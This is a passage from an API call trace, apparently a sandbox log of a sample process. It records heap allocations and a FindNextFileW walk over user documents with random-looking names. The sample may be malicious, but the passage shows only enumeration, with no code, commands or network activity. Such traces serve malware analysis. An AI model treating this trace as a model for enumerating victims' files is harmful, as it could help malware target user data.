hHeap=0x8a0000) returned 1 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1b8 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.401] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdb77400, ftCreationTime.dwHighDateTime=0x1d5e64d, ftLastAccessTime.dwLowDateTime=0x363ae3c0, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0x363ae3c0, ftLastWriteTime.dwHighDateTime=0x1d5dedf, nFileSizeHigh=0x0, nFileSizeLow=0x8295, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="mo9b RC5.csv", cAlternateFileName="MO9BRC~1.CSV")) returned 1 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cc0 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1b8 | out: hHeap=0x8a0000) returned 1 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.403] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbabf6780, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x817489c0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x817489c0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x14707, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="oxnDwHiXTyJqTe06unb5.xls", cAlternateFileName="OXNDWH~1.XLS")) returned 1 [0157.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db3c0 [0157.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cc0 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee3c8 | out: hHeap=0x8a0000) returned 1 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db3c0 | out: hHeap=0x8a0000) returned 1 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e5468 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e5468 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.406] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0734080, ftCreationTime.dwHighDateTime=0x1d5e226, ftLastAccessTime.dwLowDateTime=0x8494bac0, ftLastAccessTime.dwHighDateTime=0x1d5e4b9, ftLastWriteTime.dwLowDateTime=0x8494bac0, ftLastWriteTime.dwHighDateTime=0x1d5e4b9, nFileSizeHigh=0x0, nFileSizeLow=0x118f8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="P_2cHhLM.odt", cAlternateFileName="")) returned 1 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1b8 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cc0 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1b8 | out: hHeap=0x8a0000) returned 1 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1b8 [0157.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.408] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a766f40, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0x40a7d2d0, ftLastAccessTime.dwHighDateTime=0x1d5db4e, ftLastWriteTime.dwLowDateTime=0x40a7d2d0, ftLastWriteTime.dwHighDateTime=0x1d5db4e, nFileSizeHigh=0x0, nFileSizeLow=0x9ec8, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="SSq5T5u.odt", cAlternateFileName="")) returned 1 [0157.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cc0 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1b8 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.410] 